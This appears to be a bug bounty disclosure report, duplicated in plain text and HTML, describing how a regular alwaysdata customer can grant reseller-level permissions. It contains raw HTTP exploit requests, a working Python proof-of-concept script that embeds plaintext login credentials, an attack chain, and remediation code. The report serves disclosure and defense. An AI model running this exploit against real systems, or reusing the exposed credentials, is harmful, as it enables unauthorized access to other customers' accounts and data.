 1. Regular customer (cyberzod) creates permission with reseller flags

 └─ customer_full_accounts=on, customer_full_servers=on
 └─ email=attacker@example.com


 2. Attacker (attacker@example.com) accepts the permission



3. Attacker gains reseller-level privileges

 └─ Can access ALL customer accounts
 └─ Can access ALL server configurations
 └─ Can view/modify ALL customer data


### Business Impact



- Reputation Damage: Platform trust compromised- Data Breach: All customer data potentially exposed- Regulatory: GDPR/CCPA violations possible- Financial: Customer churn, legal liability



—



## 7. CVSS Score Breakdown



 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N


	
		 Metric  Value  Rationale 
	
	
		——–——-———–
	
	
		 Attack Vector  Network (N)  Exploitable over the network 
	
	
		 Attack Complexity  Low (L)  Simple HTTP request 
	
	
		 Privileges Required  Low (L)  Requires authenticated account 
	
	
		 User Interaction  None (N)  No user interaction needed 
	
	
		 Scope  Changed (C)  Affects other customers&amp;#039; resources 
	
	
		 Confidentiality  High (H)  Can access all customer data 
	
	
		 Integrity  High (H)  Can modify all customer data 
	
	
		 Availability  None (N)  No availability impact 
	



 Score: 8.0 (High)



—



## 8. Remediation Recommendations



### 1. Server-Side Role Validation



def create_permission(request):
    # Validate that only resellers can set reseller flags
    if not request.user.is_reseller:
        if request.POST.get(&amp;#039;customer_full_accounts&amp;#039;) or request.POST.get(&amp;#039;customer_full_servers&amp;#039;):
            raise PermissionDenied(&amp;quot;Reseller-level permissions require a reseller account&amp;quot;)
    
    # Continue with permission creation
    ...



### 2. Hide Reseller Flags from Regular Users


{% if user.is_reseller %}
    &amp;lt;input type=&amp;quot;checkbox&amp;quot; name=&amp;quot;customer_full_accounts&amp;quot;&amp;gt;
    &amp;lt;input type=&amp;quot;checkbox&amp;quot; name=&amp;quot;customer_full_servers&amp;quot;&amp;gt;
{% endif %}



### 3. Implement Proper RBAC



 Customer Roles:├── Regular User│   ├── account_full│   ├── site_full│   └── database_full├── Reseller│   ├── customer_full_accounts│   ├── customer_full_servers│   └── ALL regular permissions└── Admin

  ├── ALL reseller permissions
  └── Platform-wide privileges


### 4. Audit Existing Permissions



- Review all permissions with `customer_full_accounts` or `customer_full_servers`- Verify they were created by legitimate resellers- Remove any created by regular customers



—



## 9. Proof of Concept Screenshots



### Screenshot 1: Regular Account (No Reseller Privileges)



 Account: cyberzodAccount Type: Regular CustomerReseller Status: False



 ### Screenshot 2: Reseller Flags Found



 📝 All checkbox fields:


 customer_full_accounts

 customer_full_servers

 account_full

 site_full

 database_full

 […]




### Screenshot 3: Submission Accepted (302)



 Response Status: 302Location: /permissions/Message: Successfully created.



 ### Screenshot 4: Permission Created with Active Flags



 Permission ID: 469280customer_full_accounts: ✅ checked (active)customer_full_servers: ✅ checked (active)Grantee: test_1782361132@example.com



 —



## 10. Affected Accounts 


	
		 Account Type  Affected  Explanation 
	
	
		————–———-————-
	
	
		 Regular Customer  ✅ Yes  Can create reseller permissions 
	
	
		 Reseller  ✅ Yes  Already have these permissions (expected) 
	
	
		 Platform Admin  ❌ No  Not customer accounts 
	



 All regular customer accounts on the platform are affected.



—



## 11. References



- CWE-269: https://cwe.mitre.org/data/definitions/269.html - OWASP Broken Access Control: https://owasp.org/Top10/A01_2021-Broken_Access_Control/ - OWASP Privilege Escalation: https://owasp.org/www-community/attacks/Privilege_escalation



—



## 12. Cleanup Confirmation 


	
		 Action  Status 
	
	
		——–——–
	
	
		 Test permission created  ✅ 
	
	
		 Permission verified  ✅ 
	
	
		 Test permission deleted  ✅ 
	
	
		 Account in clean state  ✅ 
	


# Permission deleted
DELETE /permissions/469280/delete/
Response: 302 Found



—



## 13. Contact Information 


	
		 Field  Value 
	
	
		——-——-
	
	
		 Researcher  michenhenryyissuehunt@gmail.com 
	
	
		 Test Account  cyberzod (ID 482835) 
	
	
		 Submission Date  2026-06-24 
	
	
		 Program  alwaysdata Bug Bounty Program 
	



 —



## 14. Conclusion



Finding is CONFIRMED.



A regular (non-reseller) customer account can:1. ✅ See reseller-level permission flags in the UI2. ✅ Submit reseller flags and receive HTTP 3023. ✅ Create permission records with reseller flags active4. ✅ Grant reseller-level access to any email address



This vulnerability enables privilege escalation from a regular customer account to platform-wide reseller access, potentially affecting all customers and server configurations on the platform.



—

</description>
    <content:encoded><![CDATA[
<p>
# Finding: Reseller-Level Permission Flags Accessible to Regular Customer Accounts
</p>

<p>
—
</p>

<p>
## Submission Details 
</p>
<table class="inline">
	<tr>
		<td> Field </td><td> Value </td>
	</tr>
	<tr>
		<td>——-</td><td>——-</td>
	</tr>
	<tr>
		<td> <strong>Title</strong> </td><td> Reseller-Level Permission Flags Accessible to Regular Customer Accounts </td>
	</tr>
	<tr>
		<td> <strong>Severity</strong> </td><td> High </td>
	</tr>
	<tr>
		<td> <strong>CVSS Score</strong> </td><td> 8.0 </td>
	</tr>
	<tr>
		<td> <strong>CVSS Vector</strong> </td><td> CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N </td>
	</tr>
	<tr>
		<td> <strong>CWE</strong> </td><td> CWE-269 - Improper Privilege Management </td>
	</tr>
	<tr>
		<td> <strong>Endpoint</strong> </td><td> `POST <a href="https://admin.alwaysdata.com/permissions/add/" class="urlextern" title="https://admin.alwaysdata.com/permissions/add/"  rel="nofollow">https://admin.alwaysdata.com/permissions/add/</a>` </td>
	</tr>
	<tr>
		<td> <strong>Affected Fields</strong> </td><td> `customer_full_accounts`, `customer_full_servers` </td>
	</tr>
	<tr>
		<td> <strong>Date Discovered</strong> </td><td> 2026-06-24 </td>
	</tr>
	<tr>
		<td> <strong>Status</strong> </td><td> ✅ Confirmed </td>
	</tr>
</table>

<p>
 —
</p>

<p>
## 1. Description
</p>

<p>
alwaysdata&#039;s permission system allows account owners to delegate access to other users. The permissions creation form at `/permissions/add/` exposes <strong>reseller-level flags</strong> to all customers, including regular (non-reseller) accounts.
</p>

<p>
<strong>Reseller flags identified:</strong> - `customer_full_accounts` - grants access to manage all customer accounts on the platform<br />- `customer_full_servers` - grants access to manage all server configurations on the platform
</p>

<p>
<strong>The vulnerability:</strong> The server accepts these flags from any account, regardless of whether the submitting account has reseller privileges. A regular customer can create a permission record with these flags active (<acronym title="Hyper Text Transfer Protocol">HTTP</acronym> 302), and the flags are saved as &quot;checked&quot; (active) in the permission details.
</p>

<p>
—
</p>

<p>
## 2. Test Environment 
</p>
<table class="inline">
	<tr>
		<td> Item </td><td> Value </td>
	</tr>
	<tr>
		<td>——</td><td>——-</td>
	</tr>
	<tr>
		<td> <strong>Test Account</strong> </td><td> cyberzod (ID 482835) </td>
	</tr>
	<tr>
		<td> <strong>Account Type</strong> </td><td> Regular Customer (NOT reseller) </td>
	</tr>
	<tr>
		<td> <strong>Testing Method</strong> </td><td> Manual <acronym title="Hyper Text Transfer Protocol">HTTP</acronym> requests via Python </td>
	</tr>
</table>

<p>
 —
</p>

<p>
## 3. Steps to Reproduce
</p>

<p>
### Step 1: Verify Account is Regular Customer<br />
</p>
<pre class="code">

# Check account type in profile
GET https://admin.alwaysdata.com/profile/
</pre>

<p>
<strong>Result:</strong> Account confirmed as regular customer (no reseller privileges).
</p>

<p>
### Step 2: Access Permissions Add Page
</p>
<pre class="code">GET https://admin.alwaysdata.com/permissions/add/</pre>

<p>
 <strong>Result:</strong> Page loads with permission checkboxes.
</p>

<p>
### Step 3: Locate Reseller Flags
</p>

<p>
The page contains reseller-level checkboxes:<br />- `customer_full_accounts`<br />- `customer_full_servers`
</p>

<p>
### Step 4: Submit Reseller Flags
</p>

<p>
<strong>Request:</strong> 
</p>
<pre class="code">
POST /permissions/add/ HTTP/2
Host: admin.alwaysdata.com
Content-Type: application/x-www-form-urlencoded
Cookie: sessionid=...

csrfmiddlewaretoken=...&amp;
customer_full_accounts=on&amp;
customer_full_servers=on&amp;
email=test_1782361132@example.com
</pre>

<p>
<strong>Response:</strong> 
</p>
<pre class="code">
HTTP/2 302 Found
Location: /permissions/
Set-Cookie: messages=...Successfully created...
</pre>

<p>
### Step 5: Verify Permission Created
</p>
<pre class="code">GET https://admin.alwaysdata.com/permissions/469280/
</pre>

<p>
<strong>Response:</strong>
</p>
<pre class="code">Permission 469280 details:
- customer_full_accounts: checked (active)
- customer_full_servers: checked (active)
- Grantee: test_1782361132@example.com
</pre>

<p>
—
</p>

<p>
## 4. Proof of Concept
</p>

<p>
### Python PoC Script
</p>
<pre class="code">
import requests
import re
import time

EMAIL = &quot;michenhenryyissuehunt@gmail.com&quot;
PASSWORD = &quot;Cyberzod@123&quot;

s = requests.Session()
s.headers.update({
    &#039;User-Agent&#039;: &#039;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36&#039;
})

# Login
login_page = s.get(&quot;https://admin.alwaysdata.com/login/&quot;)
csrf_login = login_page.text.split(&#039;csrfmiddlewaretoken&quot; value=&quot;&#039;)[1].split(&#039;&quot;&#039;)[0]

s.post(
    &quot;https://admin.alwaysdata.com/login/&quot;,
    data={
        &quot;csrfmiddlewaretoken&quot;: csrf_login,
        &quot;login&quot;: EMAIL,
        &quot;password&quot;: PASSWORD,
        &quot;alive&quot;: &quot;on&quot;
    }
)

# Get permissions page
add_page = s.get(&quot;https://admin.alwaysdata.com/permissions/add/&quot;)
csrf = add_page.text.split(&#039;csrfmiddlewaretoken&quot; value=&quot;&#039;)[1].split(&#039;&quot;&#039;)[0]

# Create permission with reseller flags
test_email = f&quot;test_{int(time.time())}@example.com&quot;

r = s.post(
    &quot;https://admin.alwaysdata.com/permissions/add/&quot;,
    data={
        &quot;csrfmiddlewaretoken&quot;: csrf,
        &quot;customer_full_accounts&quot;: &quot;on&quot;,
        &quot;customer_full_servers&quot;: &quot;on&quot;,
        &quot;email&quot;: test_email,
    },
    allow_redirects=False
)

print(f&quot;Status: {r.status_code}&quot;)  # 302

# Verify permission was created
permissions_page = s.get(&quot;https://admin.alwaysdata.com/permissions/&quot;)
perm_ids = re.findall(r&#039;/permissions?/(\d+)/&#039;, permissions_page.text)
perm_id = max(perm_ids, key=lambda x: int(x))

detail_page = s.get(f&quot;https://admin.alwaysdata.com/permissions/{perm_id}/&quot;)

has_cfa = &#039;customer_full_accounts&#039; in detail_page.text and &#039;checked&#039; in detail_page.text
has_cfs = &#039;customer_full_servers&#039; in detail_page.text and &#039;checked&#039; in detail_page.text

print(f&quot;customer_full_accounts active: {has_cfa}&quot;)  # True
print(f&quot;customer_full_servers active: {has_cfs}&quot;)   # True
</pre>

<p>
### PoC Output
</p>
<pre class="code">Status: 302
customer_full_accounts active: True
customer_full_servers active: True
</pre>

<p>
—
</p>

<p>
## 5. Evidence Summary 
</p>
<table class="inline">
	<tr>
		<td> Evidence </td><td> Status </td>
	</tr>
	<tr>
		<td>———-</td><td>——–</td>
	</tr>
	<tr>
		<td> Account is regular customer (not reseller) </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Reseller flags exist on permissions page </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Regular account can submit reseller flags </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Server accepts submission (<acronym title="Hyper Text Transfer Protocol">HTTP</acronym> 302) </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Permission record created with reseller flags </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Flags saved as &quot;checked&quot; (active) </td><td> ✅ Confirmed </td>
	</tr>
	<tr>
		<td> Permission ID: 469280 </td><td> ✅ Confirmed </td>
	</tr>
</table>

<p>
 —
</p>

<p>
## 6. Impact
</p>

<p>
### Immediate Impact 
</p>
<table class="inline">
	<tr>
		<td> Impact </td><td> Description </td>
	</tr>
	<tr>
		<td>——–</td><td>————-</td>
	</tr>
	<tr>
		<td> <strong>Privilege Escalation</strong> </td><td> Regular customers can grant themselves or others reseller access </td>
	</tr>
	<tr>
		<td> <strong>Cross-Account Access</strong> </td><td> Reseller permissions grant access to ALL customer accounts </td>
	</tr>
	<tr>
		<td> <strong>Server Control</strong> </td><td> Reseller permissions grant access to ALL server configurations </td>
	</tr>
	<tr>
		<td> <strong>Data Exposure</strong> </td><td> Reseller permissions grant access to ALL customer data </td>
	</tr>
</table>

<p>
 ### Attack Chain
</p>

<p>
 1. Regular customer (cyberzod) creates permission with reseller flags
</p>
<pre class="code"> └─ customer_full_accounts=on, customer_full_servers=on
 └─ email=attacker@example.com</pre>

<p>
 2. Attacker (attacker@example.com) accepts the permission
</p>

<p>
3. Attacker gains reseller-level privileges
</p>
<pre class="code"> └─ Can access ALL customer accounts
 └─ Can access ALL server configurations
 └─ Can view/modify ALL customer data</pre>

<p>
### Business Impact
</p>

<p>
- <strong>Reputation Damage:</strong> Platform trust compromised<br />- <strong>Data Breach:</strong> All customer data potentially exposed<br />- <strong>Regulatory:</strong> GDPR/CCPA violations possible<br />- <strong>Financial:</strong> Customer churn, legal liability
</p>

<p>
—
</p>

<p>
## 7. CVSS Score Breakdown
</p>

<p>
 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
</p>
<table class="inline">
	<tr>
		<td> Metric </td><td> Value </td><td> Rationale </td>
	</tr>
	<tr>
		<td>——–</td><td>——-</td><td>———–</td>
	</tr>
	<tr>
		<td> Attack Vector </td><td> Network (N) </td><td> Exploitable over the network </td>
	</tr>
	<tr>
		<td> Attack Complexity </td><td> Low (L) </td><td> Simple <acronym title="Hyper Text Transfer Protocol">HTTP</acronym> request </td>
	</tr>
	<tr>
		<td> Privileges Required </td><td> Low (L) </td><td> Requires authenticated account </td>
	</tr>
	<tr>
		<td> User Interaction </td><td> None (N) </td><td> No user interaction needed </td>
	</tr>
	<tr>
		<td> Scope </td><td> Changed (C) </td><td> Affects other customers&#039; resources </td>
	</tr>
	<tr>
		<td> Confidentiality </td><td> High (H) </td><td> Can access all customer data </td>
	</tr>
	<tr>
		<td> Integrity </td><td> High (H) </td><td> Can modify all customer data </td>
	</tr>
	<tr>
		<td> Availability </td><td> None (N) </td><td> No availability impact </td>
	</tr>
</table>

<p>
 <strong>Score: 8.0 (High)</strong>
</p>

<p>
—
</p>

<p>
## 8. Remediation Recommendations
</p>

<p>
### 1. Server-Side Role Validation<br />
</p>
<pre class="code">

def create_permission(request):
    # Validate that only resellers can set reseller flags
    if not request.user.is_reseller:
        if request.POST.get(&#039;customer_full_accounts&#039;) or request.POST.get(&#039;customer_full_servers&#039;):
            raise PermissionDenied(&quot;Reseller-level permissions require a reseller account&quot;)
    
    # Continue with permission creation
    ...
</pre>

<p>
### 2. Hide Reseller Flags from Regular Users
</p>
<pre class="code">
{% if user.is_reseller %}
    &lt;input type=&quot;checkbox&quot; name=&quot;customer_full_accounts&quot;&gt;
    &lt;input type=&quot;checkbox&quot; name=&quot;customer_full_servers&quot;&gt;
{% endif %}
</pre>

<p>
### 3. Implement Proper RBAC
</p>

<p>
 Customer Roles:<br />├── Regular User<br />│   ├── account_full<br />│   ├── site_full<br />│   └── database_full<br />├── Reseller<br />│   ├── customer_full_accounts<br />│   ├── customer_full_servers<br />│   └── ALL regular permissions<br />└── Admin
</p>
<pre class="code">  ├── ALL reseller permissions
  └── Platform-wide privileges</pre>

<p>
### 4. Audit Existing Permissions
</p>

<p>
- Review all permissions with `customer_full_accounts` or `customer_full_servers`<br />- Verify they were created by legitimate resellers<br />- Remove any created by regular customers
</p>

<p>
—
</p>

<p>
## 9. Proof of Concept Screenshots
</p>

<p>
### Screenshot 1: Regular Account (No Reseller Privileges)
</p>

<p>
 Account: cyberzod<br />Account Type: Regular Customer<br />Reseller Status: False
</p>

<p>
 ### Screenshot 2: Reseller Flags Found
</p>

<p>
 📝 All checkbox fields:
</p>
<ol>
<li class="level1"><div class="li"> customer_full_accounts</div>
</li>
<li class="level1"><div class="li"> customer_full_servers</div>
</li>
<li class="level1"><div class="li"> account_full</div>
</li>
<li class="level1"><div class="li"> site_full</div>
</li>
<li class="level1"><div class="li"> database_full</div>
</li>
<li class="level1"><div class="li"> […]</div>
</li>
</ol>

<p>
### Screenshot 3: Submission Accepted (302)
</p>

<p>
 Response Status: 302<br />Location: /permissions/<br />Message: Successfully created.
</p>

<p>
 ### Screenshot 4: Permission Created with Active Flags
</p>

<p>
 Permission ID: 469280<br />customer_full_accounts: ✅ checked (active)<br />customer_full_servers: ✅ checked (active)<br />Grantee: test_1782361132@example.com
</p>

<p>
 —
</p>

<p>
## 10. Affected Accounts 
</p>
<table class="inline">
	<tr>
		<td> Account Type </td><td> Affected </td><td> Explanation </td>
	</tr>
	<tr>
		<td>————–</td><td>———-</td><td>————-</td>
	</tr>
	<tr>
		<td> <strong>Regular Customer</strong> </td><td> ✅ Yes </td><td> Can create reseller permissions </td>
	</tr>
	<tr>
		<td> <strong>Reseller</strong> </td><td> ✅ Yes </td><td> Already have these permissions (expected) </td>
	</tr>
	<tr>
		<td> <strong>Platform Admin</strong> </td><td> ❌ No </td><td> Not customer accounts </td>
	</tr>
</table>

<p>
 <strong>All regular customer accounts on the platform are affected.</strong>
</p>

<p>
—
</p>

<p>
## 11. References
</p>

<p>
- <strong>CWE-269:</strong> <a href="https://cwe.mitre.org/data/definitions/269.html" class="urlextern" title="https://cwe.mitre.org/data/definitions/269.html"  rel="nofollow">https://cwe.mitre.org/data/definitions/269.html</a> - <strong>OWASP Broken Access Control:</strong> <a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/" class="urlextern" title="https://owasp.org/Top10/A01_2021-Broken_Access_Control/"  rel="nofollow">https://owasp.org/Top10/A01_2021-Broken_Access_Control/</a> - <strong>OWASP Privilege Escalation:</strong> <a href="https://owasp.org/www-community/attacks/Privilege_escalation" class="urlextern" title="https://owasp.org/www-community/attacks/Privilege_escalation"  rel="nofollow">https://owasp.org/www-community/attacks/Privilege_escalation</a>
</p>

<p>
—
</p>

<p>
## 12. Cleanup Confirmation 
</p>
<table class="inline">
	<tr>
		<td> Action </td><td> Status </td>
	</tr>
	<tr>
		<td>——–</td><td>——–</td>
	</tr>
	<tr>
		<td> Test permission created </td><td> ✅ </td>
	</tr>
	<tr>
		<td> Permission verified </td><td> ✅ </td>
	</tr>
	<tr>
		<td> Test permission deleted </td><td> ✅ </td>
	</tr>
	<tr>
		<td> Account in clean state </td><td> ✅ </td>
	</tr>
</table>
<pre class="code">
# Permission deleted
DELETE /permissions/469280/delete/
Response: 302 Found
</pre>

<p>
—
</p>

<p>
## 13. Contact Information 
</p>
<table class="inline">
	<tr>
		<td> Field </td><td> Value </td>
	</tr>
	<tr>
		<td>——-</td><td>——-</td>
	</tr>
	<tr>
		<td> <strong>Researcher</strong> </td><td> michenhenryyissuehunt@gmail.com </td>
	</tr>
	<tr>
		<td> <strong>Test Account</strong> </td><td> cyberzod (ID 482835) </td>
	</tr>
	<tr>
		<td> <strong>Submission Date</strong> </td><td> 2026-06-24 </td>
	</tr>
	<tr>
		<td> <strong>Program</strong> </td><td> alwaysdata Bug Bounty Program </td>
	</tr>
</table>

<p>
 —
</p>

<p>
## 14. Conclusion
</p>

<p>
<strong>Finding is CONFIRMED.</strong>
</p>

<p>
A regular (non-reseller) customer account can:<br />1. ✅ See reseller-level permission flags in the UI<br />2. ✅ Submit reseller flags and receive <acronym title="Hyper Text Transfer Protocol">HTTP</acronym> 302<br />3. ✅ Create permission records with reseller flags active<br />4. ✅ Grant reseller-level access to any email address
</p>

<p>
This vulnerability enables privilege escalation from a regular customer account to platform-wide reseller access, potentially affecting all customers and server configurations on the platform.
</p>

<p>
—
</p>
]]></content:encoded>
  </item>
  </rdf:RDF>
